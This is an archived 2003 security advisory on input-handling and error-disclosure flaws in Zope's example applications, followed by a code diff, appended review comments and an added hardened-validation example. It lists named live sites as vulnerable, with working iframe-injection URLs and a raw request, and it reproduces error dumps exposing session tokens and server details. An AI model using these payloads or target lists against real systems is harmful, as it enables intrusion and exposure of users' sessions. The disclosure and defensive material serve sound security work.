Full Disclosure mailing list archives
Zope
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sat, 21 Jun 2003 01:53:09 -0700
-= 0day - Freedom of Voice - Freedom of Choice =-
------------------------------------------------------------------
- EXPL-A-2003-009 exploitlabs.com Advisory 009
------------------------------------------------------------------
-=- The DoPe on zOpE -=-
Donnie Werner
June 19, 2003
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt

Product:
--------
Zope -=- open source application server
http://www.zope.com/

Vulnerability(s):
=================
1  - Empty Upload ( physical location dump )
     -=- /Examples/FileLibrary/addFile
2  - Html / js injection
     -=- /Examples/db/
3  - Blank Query
     -=- /Examples/ShoppingCart
3a - iframe Query ( Html/js injection )
     -=- /Examples/ShoppingCart/addItems
3b - Unchecked Input Length
     -=- /Examples/ShoppingCart/addItems
3c - Unchecked Characters
     -=- /Examples/ShoppingCart/addItems

Remote:
-------
yup

not vulnerable to #1 ( blank upload )
-----------------------------------
examples..

http://www.aixtraware.de/TCPware/Examples
Server: Zope/(Zope 2.6.1 (binary release, python 2.1, linux2-x86), python 2.1.3, linux2) ZServer/1.1b1

http://ispg.csu.edu.au
Server: Zope/(Zope 2.5.1 (source release, python 2.1, linux2), python 2.1.3, freebsd4) ZServer/1.1b1

http://www.jungle2.org
Server: Zope/(Zope 2.5.1 (OpenBSD package zope-2.5.1p1), python 2.1.3, openbsd3) ZServer/1.1b1

vulnerable
----------
Example URLS - #1:

http://klever.multimedia.fh-augsburg.de
Server: Zope/(Zope 2.6.1 (source release, python 2.1, linux2), python 2.1.3, linux2) ZServer/1.1b1

http://grlug.org/
Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12 mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.1.2 mod_perl/1.26

http://grlug.org/zope/Examples/FileLibrary/addFile

Error...
Zope has encountered an error while publishing this resource.

Error Type: Bad Request
Error Value: Empty or invalid id specified.

Troubleshooting Suggestions
The URL may be incorrect.
The parameters passed to this resource may be incorrect.
A resource that this resource relies on may be encountering an error.

For more detailed information about the error, please refer to the HTML source for this page.
If the error persists please contact the site maintainer. Thank you for your patience.

Traceback (innermost last):
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 150, in publish_module
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 114, in publish
  File /usr/local/src/zope/lib/python/Zope/__init__.py, line 159, in zpublisher_exception_hook
    (Object: FileLibrary)
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 98, in publish
  File /usr/local/src/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply
    (Object: addFile)
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Products/PythonScripts/PythonScript.py, line 302, in _exec
    (Object: addFile)
    (Info: ({'script': <PythonScript instance at 8c23a90>, 'context': <Folder instance at 89548e0>, 'container': <Folder instance at 89548e0>, 'traverse_subpath': []}, (<ZPublisher.HTTPRequest.FileUpload instance at 0x8b2eba4>,), {}, None))
  File Script (Python), line 7, in addFile
  File /usr/local/src/zope/lib/python/OFS/Image.py, line 52, in manage_addFile
    (Object: Files)
  File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 236, in _setObject
    (Object: Files)
  File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 53, in checkValidId
    (Object: Files)
Bad Request: (see above)

Example-1.2:

http://www.pitch.com
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12

/Examples/FileLibrary/addFile

Site Error
An error was encountered while publishing this resource.

Error Type: Bad Request
Error Value: Empty or invalid id specified.

Traceback
Traceback (innermost last):
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in publish
  File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply
    (Object: addFile)
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object
    (Object: addFile)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__
    (Object: addFile)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec
    (Object: addFile)
  File /usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py, line 291, in _exec
    (Object: addFile)
    (Info: ({'script': , 'context': , 'container': , 'traverse_subpath': []}, (,), {}, None))
  File Script (Python), line 7, in addFile
  File /usr/local/zope/lib/python/OFS/Image.py, line 52, in manage_addFile
    (Object: Files)
  File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 219, in _setObject
    (Object: Files)
  File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 53, in checkValidId
    (Object: Files)
Bad Request: Empty or invalid id specified.
======================================================================
======================================================================
Example-2.1:

http://www.c-media.com.au/Examples/db/ExampledbBrowseReport
http://198.78.66.174:8080/Examples/

exploit:
--------
edit the "description" field for html / js injection
<iframe src=http://somesite.com</iframe>
viewing of the existing database is rendered useless

======================================================================
======================================================================
Example-3:

http://www.sfweekly.com/Examples/ShoppingCart
enter a blank as a quantity entry

http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0

Site Error
An error was encountered while publishing this resource.
Error Type: ValueError
Error Value: invalid literal for int():

Traceback
Traceback (innermost last):
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in publish
  File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply
    (Object: addItems)
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object
    (Object: addItems)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__
    (Object: addItems)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec
    (Object: addItems)
  File /usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py, line 291, in _exec
    (Object: addItems)
    (Info: ({'script': , 'context': , 'container': , 'traverse_subpath': []}, ([id: '510-007', quantity: '', id: '510-122', quantity: '0', id: '510-115', quantity: '0'],
    form
      orders [id: '510-007', quantity: '', id: '510-122', quantity: '0', id: '510-115', quantity: '0']
    cookies
      _ZopeId '23329946A0z9drL5xZk'
      Apache '12.230.1.165.260541049326654641'
    lazy items
    other
      _ZopeId '23329946A0z9drL5xZk'
      orders [id: '510-007', quantity: '', id: '510-122', quantity: '0', id: '510-115', quantity: '0']
      Apache '12.230.1.165.260541049326654641'
      SESSION id: 10531690730759726137, token: 23329946A0z9drL5xZk, contents: [('items', {})]
      traverse_subpath []
      SERVER_URL 'http://www.sfweekly.com'
      VirtualRootPhysicalPath ('', 'san')
      PUBLISHED <PythonScript instance at 9e01660>
      URL 'http://www.sfweekly.com/Examples/ShoppingCart/addItems'
      AUTHENTICATED_USER Anonymous User
      TraversalRequestNameStack []
      AUTHENTICATION_PATH 'san/virtual_hosts'
      URL0 http://www.sfweekly.com/Examples/ShoppingCart/addItems
      URL1 http://www.sfweekly.com/Examples/ShoppingCart
      URL2 http://www.sfweekly.com/Examples
      URL3 http://www.sfweekly.com
      BASE0 http://www.sfweekly.com
      BASE1 http://www.sfweekly.com
      BASE2 http://www.sfweekly.com/Examples
      BASE3 http://www.sfweekly.com/Examples/ShoppingCart
      BASE4 http://www.sfweekly.com/Examples/ShoppingCart/addItems
    environ
      DOCUMENT_ROOT '/home/nti/htdocs/san'
      SERVER_ADDR '63.241.135.221'
      HTTP_ACCEPT_ENCODING 'gzip, deflate'
      SCRIPT_FILENAME '/home/httpd/fastcgi/slave3'
      GATEWAY_INTERFACE 'CGI/1.1'
      SERVER_PORT '80'
      PATH_TRANSLATED '/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/Examples/ShoppingCart/addItems'
      source 'slave3'
      UNIQUE_ID 'PsYVuD-xh80AAEv9Xno'
      HTTP_ACCEPT_LANGUAGE 'en-us'
      REMOTE_ADDR '12.229.234.100'
      SERVER_NAME 'www.sfweekly.com'
      HTTP_CONNECTION 'Keep-Alive'
      HTTP_USER_AGENT 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; USER AGENT)'
      HTTP_ACCEPT 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*'
      REQUEST_URI '/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0'
      PATH '/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin'
      QUERY_STRING 'orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0'
      SERVER_PROTOCOL 'HTTP/1.1'
      SCRIPT_URL '/Examples/ShoppingCart/addItems'
      HTTP_HOST 'www.sfweekly.com'
      REQUEST_METHOD 'GET'
      SERVER_SIGNATURE ''
      SCRIPT_URI 'http://www.sfweekly.com/Examples/ShoppingCart/addItems'
      SCRIPT_NAME ''
      SITE 'san'
      SERVER_SOFTWARE 'Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12'
      SERVER_ADMIN 'webadmin () newtimes com'
      PATH_INFO '/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/Examples/ShoppingCart/addItems'
      HTTP_COOKIE 'Apache=12.230.1.165.260541049326654641; _ZopeId="23329946A0z9drL5xZk"'
      REMOTE_PORT '21891'
      HTTP_REFERER 'http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0'
    ), {}, (None,)))
  File Script (Python), line 11, in addItems
ValueError: invalid literal for int():

--------------------------------------------------------------------------------
--------------------------------------------------------------------------------

orders [id: '510-007', quantity: '0', id: '510-122', quantity: '', id: '510-115', quantity: '0']
orders [id: '510-007', quantity: '0', id: '510-122', quantity: 'test', id: '510-115', quantity: '0']

--------------------------------------------------------------------------------
--------------------------------------------------------------------------------

example 3a:
-----------
this i love...
insert an iframe into the unchecked length quantity field

<iframe src="http://ebay.com"></iframe>
<iframe src=http://ebay.com
<iframe src="http://ebay.com

http://www.jungle2.org/Examples/ShoppingCart

http://www.westword.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122&orders.quantity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com%3C%2Fiframe%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0

<iframe src=http://ebay.com

GET /Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.westword.com/Examples/ShoppingCart/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; USER AGENT)
Host: www.westword.com
Cookie: Apache=12.229.228.51.196431047271232157; _ZopeId="50159375A0z9pTTmVlU"

Post injection url analysis:
----------------------------
puts this URL in a second frame before the main ebay.com frame, injecting
and appending the original info to the external url reference, resulting
in 2 iframes
as evidenced by:

<iframe src=http://ebay.com/
http://ebay.com/',
http://ebay.com',%20id:%20'510-122',%20quantity:%20'0',%20id:%20'510-115',%20quantity:%20'0'],%20<h3>form</h3><table><tr%20valign=
<iframe src=http://ebay.com
http://ebay.com',/
http://ebay.com/
<iframe src="http://ebay.com"></iframe>
http://ebay.com/

Example 3b - 3c:
----------------
Sending any string longer than 11 characters in the quantity field causes a dump.
details here...

http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=123456789101112131415&orders.id%3Arecords=510-122&orders.quantity%3Arecords=+%3Ctd%3ENeed+to+go+out+of+town+for+a+few+days%2C+and+no+one+can+feed+your+pigeons%3F+Don%27t+worry%2C+we+now+have+the+virtually+spillproof+hopper+feeder.+Made+from+birch+plywood+it+holds+from+30+to+35+pounds+of+grain.+Pigeons+can+get+at+the+feed+through+holes+in+the+plexiglass+cover%2C+but+will+not+be+able+to+kick+out+any+feed.%3C%2Ftd%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0

reveal these items..
      SESSION id: 10546821410043251757, token: 40684361A01gE7Hjjvc, contents: []
      SERVER_URL 'http://www.sfweekly.com'
      VirtualRootPhysicalPath ('', 'san')
      PUBLISHED <PythonScript instance at 96c4040>
      URL 'http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems'
      AUTHENTICATED_USER Anonymous User
      TraversalRequestNameStack []
      AUTHENTICATION_PATH 'san/virtual_hosts'
      URL0 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems
      URL1 http://www.sfweekly.com/calendar/Examples/ShoppingCart
      URL2 http://www.sfweekly.com/calendar/Examples
      URL3 http://www.sfweekly.com/calendar
      URL4 http://www.sfweekly.com
      BASE0 http://www.sfweekly.com
      BASE1 http://www.sfweekly.com
      BASE2 http://www.sfweekly.com/calendar
      BASE3 http://www.sfweekly.com/calendar/Examples
      BASE4 http://www.sfweekly.com/calendar/Examples/ShoppingCart
      BASE5 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems
    environ
      DOCUMENT_ROOT '/home/nti/htdocs/san'
      SERVER_ADDR '63.241.135.221'
      HTTP_ACCEPT_ENCODING 'gzip, deflate'
      SCRIPT_FILENAME '/home/httpd/fastcgi/slave2'
      GATEWAY_INTERFACE 'CGI/1.1'
      SERVER_PORT '80'
      PATH_TRANSLATED '/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/calendar/Examples/ShoppingCart/addItems'
      source 'slave2'
      UNIQUE_ID 'Pt02bz-xh80AAC79HHU'

===================================================================
extra notes
===================================================================

Update of /cvs-repository/Releases/Zope/lib/python/Products/PythonScripts
In directory cvs.zope.org:/tmp/cvs-serv29374/Products/PythonScripts

Modified Files:
        Utility.py module_access_examples.py
Log Message:
Merge evan-modsec_fix-branch

=== Releases/Zope/lib/python/Products/PythonScripts/Utility.py 1.4 => 1.5 ===
 __version__='$Revision$'[11:-2]
-from AccessControl import ModuleSecurityInfo, ClassSecurityInfo
-from Globals import InitializeClass
-import string
-
-def allow_module(module_name):
-    """Allow a module and all its contents to be used from a
-    restricted Script. The argument module_name may be a simple
-    or dotted module or package name. Note that if a package
-    path is given, all modules in the path will be available."""
-    ModuleSecurityInfo(module_name).setDefaultAccess(1)
-    dot = string.find(module_name, '.')
-    while dot > 0:
-        ModuleSecurityInfo(module_name[:dot]).setDefaultAccess(1)
-        dot = string.find(module_name, '.', dot + 1)
-
-def allow_class(Class):
-    """Allow a class and all of its methods to be used from a
-    restricted Script. The argument Class must be a class."""
-    Class._security = sec = ClassSecurityInfo()
-    sec.declareObjectPublic()
-    sec.setDefaultAccess(1)
-    sec.apply(Class)
-    InitializeClass(Class)
+# These have been relocated, and should be imported from AccessControl
+from AccessControl import allow_module, allow_class

=== Releases/Zope/lib/python/Products/PythonScripts/module_access_examples.py 1.1 => 1.2 ===
 '''
-from Products.PythonScripts.Utility import allow_module, allow_class
+from AccessControl import allow_module, allow_class, allow_type
 from AccessControl import ModuleSecurityInfo, ClassSecurityInfo
 from Globals import InitializeClass

@@ -42,9 +42,9 @@
 # ModuleSecurityInfo('re').declarePublic('compile', 'findall',
 #   'match', 'search', 'split', 'sub', 'subn', 'error',
 #   'I', 'L', 'M', 'S', 'X')
-# from re import RegexObject, MatchObject
-# allow_class(RegexObject)
-# allow_class(MatchObject)
+# import re
+# allow_type(type(re.compile('')))
+# allow_type(type(re.match('x','x')))
 # ModuleSecurityInfo('StringIO').declarePublic('StringIO'

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
info () zope com - Concurrent with this advisory

Credits:
--------
Donnie Werner
http://exploitlabs.com "finding your holes"
morning_wood () frame4 com - get tested

-------------------------------------------------------------------------
be a good vendor... test your products first, it is your problem, fix it.
http://nothackers.org - it's t0day
-------------------------------------------------------------------------

_______________________________________________
0day mailing list
0day () nothackers org
http://nothackers.org/mailman/listinfo/0day

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
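Review bot: in the Utility.py hunk, the replacement comment says the two functions were relocated but not that the old import path is kept only for backward compatibility, and the removed docstrings' caveats go with them: the old allow_module docstring warned that a dotted name makes every package along the path available, and the old allow_class body set default access to 1 on the whole class after declaring the object public. Since the AccessControl implementations are not in this patch, the log message should state whether that behaviour is unchanged or was tightened as part of the modsec fix; suggest expanding the comment to something like `# Kept for backward compatibility; the implementations now live in AccessControl`.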
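Review bot: in the `@@ -42,9 +42,9 @@` hunk, the move from `allow_class(RegexObject)` to `allow_type(type(re.compile('')))` is not explained in the example file; the reason is visible in the removed allow_class body in Utility.py, which assigns `Class._security` and calls `InitializeClass`, something a built-in extension type such as the compiled-pattern or match type cannot carry, so a one-line comment saying that allow_type exists for types that cannot take a ClassSecurityInfo would save the next reader the trip. Also, the trailing context line `# ModuleSecurityInfo('StringIO').declarePublic('StringIO'` is cut off in the pasted hunk, so its parenthesis balance cannot be checked here.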
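The ShoppingCart findings (3, 3a, 3b, 3c) all come from one missing step: the script calls int() on a raw quantity record and echoes the field back into HTML. The following is an added example, not code from the advisory or from Zope, that reproduces the trusting behaviour beside a validating version; the record shape, the item-id pattern, the length cap and the business limit are constructed assumptions.

```python
import html
import re

# Constructed sample records, shaped like the ":records" form marshalling
# shown in the advisory: a blank, an HTML, an overlong and one valid quantity.
SAMPLE_ORDERS = [
    {"id": "510-007", "quantity": ""},
    {"id": "510-122", "quantity": "<iframe src=http://ebay.com"},
    {"id": "510-115", "quantity": "123456789101112131415"},
    {"id": "510-007", "quantity": "2"},
]

MAX_QTY_LEN = 11   # hypothetical cap, set at the 11-character threshold the advisory reports
MAX_QTY = 1000     # hypothetical business limit for one line item
ID_RE = re.compile(r"^[0-9]{3}-[0-9]{3}$")  # shape of the example item ids (assumption)
QTY_RE = re.compile(r"^[0-9]{1,%d}$" % MAX_QTY_LEN)

def add_items_vulnerable(orders):
    """Trusting version: int() on the raw field, so a blank quantity raises
    ValueError and any HTML in the field is stored and echoed verbatim."""
    cart = {}
    for rec in orders:
        cart[rec["id"]] = int(rec["quantity"])
    return cart

def run_vulnerable(orders):
    """Report how the trusting version fails; in the advisory this exception
    reached the publisher, which rendered the traceback and REQUEST dump."""
    try:
        return ("ok", add_items_vulnerable(orders))
    except ValueError as exc:
        return ("ValueError", str(exc))

def add_items_hardened(orders):
    """Validate every record before use. Returns (accepted, rejected):
    accepted maps item id to quantity; rejected holds (escaped value, reason)
    pairs that are safe to echo back into an HTML page."""
    accepted, rejected = {}, []
    for rec in orders:
        item_id = rec.get("id", "")
        qty_raw = rec.get("quantity", "")
        if not ID_RE.match(item_id):
            rejected.append((html.escape(item_id), "bad id"))
            continue
        if not QTY_RE.match(qty_raw):  # rejects blank, HTML and overlong input
            rejected.append((html.escape(qty_raw), "quantity must be 1-%d digits" % MAX_QTY_LEN))
            continue
        qty = int(qty_raw)
        if qty > MAX_QTY:
            rejected.append((qty_raw, "quantity too large"))
            continue
        if qty:  # zero means nothing ordered, as in the advisory's own requests
            accepted[item_id] = accepted.get(item_id, 0) + qty
    return accepted, rejected
```

Catching the ValueError is only half of it: the dumps above show Zope's error view handing the whole REQUEST (session token, filesystem paths, REMOTE_ADDR) to an anonymous user, so the error page itself must not render that detail to unauthenticated clients.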